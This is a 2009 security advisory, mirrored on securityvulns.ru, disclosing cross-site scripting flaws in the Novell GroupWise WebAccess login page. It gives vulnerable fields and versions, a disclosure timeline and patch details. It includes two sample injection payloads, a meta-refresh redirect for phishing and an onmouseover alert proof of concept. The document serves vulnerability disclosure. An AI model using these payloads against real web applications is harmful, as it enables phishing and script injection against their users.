Computer Security

Security Advisory: Novell GroupWise Web Access Multiple XSS
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  MULTIPLE SQL INJECTION VULNERABILITIES --Flash Quiz Beta 2-->

  DDIVRT-2009-25 IPsession SQL Injection Vulnerability

  [Full-disclosure] Drupal 6.12 (core) User Module XSS Vulnerability

  DMXReady Registration Manager Arbitrary File Upload Vulnerability

From:swhite_(at)_securestate.com <swhite_(at)_securestate.com>
Date:21.05.2009
Subject:Novell GroupWise Web Access Multiple XSS

    Novell GroupWise Web Access Multiple XSS
 /============================================\
/~ SecureState R&D Team - leroy and sasquatch ~\
/~  Discovered: 11-24-08, 03-05-09              ~\
\~  Vendor Notified:  01-06-09, 03-05-09        ~/
\~ Vendor Publication:  05-21-09              ~/
 \============================================/


  /------------------------------------------------------------------------------
------------------\
 /~ Novell's Groupwise WebAccess login page is vulnerable to several cross-site scripting attacks. ~\
/~                                                                                  
                ~\
<    Example URL: https://www.website.com/gw/webacc                                                    >
\~                                                                                  
                ~/
 \~ An attempt to deter the attack is made in that <script> tags are replaced with <!-- pt>        ~/
  \--------------------------------------------------------------------------
----------------------/


|--------------------------------------------------------------|
| Vulnerable Fields: GWAP.version, User.Theme.index, User.lang |
| Vulnerable Versions: 7.0.1, 7.0.3, ?                         |
|--------------------------------------------------------------|
| Vulnerable Fields: User.Lang                                 |
| Vulnerable Versions: 8.0, ?                                  |
|--------------------------------------------------------------|


|------------------------------------------------------------------------------
|
| Phishing via URL Redirection:                                                |
| "/><meta http-equiv="refresh" content="0; url=http://www.securestate.com" /> |
|------------------------------------------------------------------------------
|
| JavaScript Execution Proof of Concept:                                       |
| " /><div onmouseover="alert('xss')" style="javascript:visibility:visible;">  |
|------------------------------------------------------------------------------
|


|--------------------------------------------------------------------------------
|
| Fix Info -->  Technical Information Document 7003271                           |
|                                                                                |

| http://www.novell.com/support/search.do?usemicrosite=true&searchString=700327
1 |
|--------------------------------------------------------------------------------
|
| Version 7 --> 7.03 Hot Patch 2                                                 |
| Fixes vulnerable fields: GWAP.version, User.Theme, but not User.lang           |
|--------------------------------------------------------------------------------
|
| Version 8 (CVE-2009-1635)                                                      |
|--------------------------------------------------------------------------------
|
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru
test server